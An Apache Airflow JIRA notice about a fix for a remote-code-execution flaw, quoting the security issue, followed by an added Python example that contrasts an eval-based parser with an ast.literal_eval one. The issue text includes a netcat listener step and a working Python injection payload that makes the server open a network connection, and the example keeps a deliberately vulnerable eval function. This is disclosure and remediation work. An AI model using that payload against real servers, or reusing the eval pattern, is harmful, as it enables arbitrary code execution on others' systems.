[ https://issues.apache.org/jira/browse/AIRFLOW-933?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15891150#comment-15891150 ]
ASF subversion and git services commented on AIRFLOW-933:
---------------------------------------------------------
Commit 88d9b0dc96e7528c87326c8070ee276e8565545f in incubator-airflow's branch
refs/heads/master from [~amaliujia]
[ https://git-wip-us.apache.org/repos/asf?p=incubator-airflow.git;h=88d9b0d ]
[AIRFLOW-933] use ast.literal_eval rather than eval because ast.literal_eval does not execute input.
This PR addresses the following issues:
- *(https://issues.apache.org/jira/browse/AIRFLOW-933)*
This PR is trying to solve a security issue. The test was done by setting up a local web server and reproducing the issue described in the JIRA link above.
Closes #2117 from amaliujia/master
> Security - Airflow Use of Eval Allows for Remote Code Execution
> ---------------------------------------------------------------
>
> Key: AIRFLOW-933
> URL: https://issues.apache.org/jira/browse/AIRFLOW-933
> Project: Apache Airflow
> Issue Type: Bug
> Reporter: Rui Wang
> Assignee: Rui Wang
>
> Impact: Any user with the ability to create or edit Charts may execute
> arbitrary code on the Airflow server.
> Location: The Default Parameters form field sent when saving a Chart located at
> /admin/chart/new/
> Description: The Chart functionality allows for the definition of Default
> Parameters, which are baseline constraints for the values within a chart.
> This data is user-controllable and passed directly to a Python eval, which
> will execute code:
> {code}
> def label_link(v, c, m, p):
>     try:
>         # m.default_params is the user-supplied "Default Parameters" text; eval executes it
>         default_params = eval(m.default_params)
>     except:
>         default_params = {}
>     url = url_for(
>         'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
>         **default_params)
>     return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))
> {code}
> Reproduction Steps:
> 1. Configure a local instance of Airflow, and start a local netcat listener
> with the following shell command: nc -l 1337.
> 2. Access Airflow as a user able to create or edit Charts.
> 3. Browse to /admin/chart/new to bring-up the UI for creating a Chart.
> 4. In its Default Parameters field, enter the following example payload:
> (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read(), None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, __g))]][0])(globals())
> 5. Save the Chart, and observe that the application has made a network
> request to your listener, indicating that your code has executed.
> Remediation: Use the Python method ast.literal_eval
> (https://docs.python.org/3/library/ast.html#ast.literal_eval) which safely
> parses its input, rather than executing it as code.
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
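The following is an added example, not code from the Airflow project or from the issue reporter, showing the vulnerable pattern from the issue beside the remediation it recommends. `parse_default_params_unsafe` mirrors the pre-fix `eval` logic and `parse_default_params` applies `ast.literal_eval`. The function names, the `EXECUTED` marker list, the benign marker payload and the sample parameter strings are constructed for this example; the RCE payload string is the one from the issue and is never evaluated here. The hardened parser also goes beyond the commit by checking that the parsed literal is a dict with string keys, since that is what `url_for(**default_params)` actually needs, and by catching the MemoryError/RecursionError that `ast.literal_eval` can raise on deeply nested input (its documentation notes it can exhaust the parser on sufficiently large or complex strings).

```python
import ast
from typing import Any, Dict

# Payload from the issue, kept only as a string so that nothing in this
# module ever evaluates it.
RCE_PAYLOAD = (
    "(lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read(), None)[1] "
    "for __g['urllib'] in [(__import__('urllib.request', __g, __g))]][0])(globals())"
)

# Constructed marker: an eval() payload appends to this list instead of
# calling out to a listener, so code execution is observable offline.
EXECUTED: list = []
MARKER_PAYLOAD = "EXECUTED.append('ran') or {}"

# Constructed examples of what a legitimate Default Parameters value looks like.
GOOD_PARAMS = "{'ds': '2017-01-01', 'limit': 10}"
NOT_A_DICT = "[1, 2, 3]"
NON_STR_KEYS = "{1: 'x'}"

# Exceptions ast.literal_eval raises on hostile or malformed input.
LITERAL_EVAL_ERRORS = (ValueError, SyntaxError, TypeError, MemoryError, RecursionError)


def parse_default_params_unsafe(raw: str) -> Dict[str, Any]:
    """Pre-fix behaviour: eval() runs whatever the Chart author typed.

    Any expression, including imports and network calls, executes before
    the bare except can swallow its result.
    """
    try:
        return eval(raw)  # noqa: S307 - deliberately vulnerable
    except Exception:
        return {}


def parse_default_params(raw: str) -> Dict[str, Any]:
    """Remediated behaviour: build Python literals only, never execute.

    ast.literal_eval rejects calls, lambdas, attribute access and names,
    so the RCE payload never runs. We additionally require a dict with
    str keys because the value is splatted into url_for(**default_params);
    anything else falls back to the empty mapping the original code used.
    """
    try:
        value = ast.literal_eval(raw)
    except LITERAL_EVAL_ERRORS:
        return {}
    if not isinstance(value, dict) or not all(isinstance(k, str) for k in value):
        return {}
    return value


def literal_eval_rejects(raw: str) -> bool:
    """True if ast.literal_eval refuses the input without executing it."""
    try:
        ast.literal_eval(raw)
    except LITERAL_EVAL_ERRORS:
        return True
    return False


if __name__ == "__main__":
    print("eval path, marker payload:", parse_default_params_unsafe(MARKER_PAYLOAD), EXECUTED)
    print("literal_eval path, marker payload:", parse_default_params(MARKER_PAYLOAD))
    print("literal_eval rejects RCE payload:", literal_eval_rejects(RCE_PAYLOAD))
    print("literal_eval path, good params:", parse_default_params(GOOD_PARAMS))
```

Note that `ast.literal_eval` still parses the whole string before deciding to reject it, so length limits on the form field remain worthwhile; the dict-shape check is the part a reviewer would want added on top of the commit, because `url_for(**x)` with a list or an int-keyed dict raises a TypeError rather than failing closed.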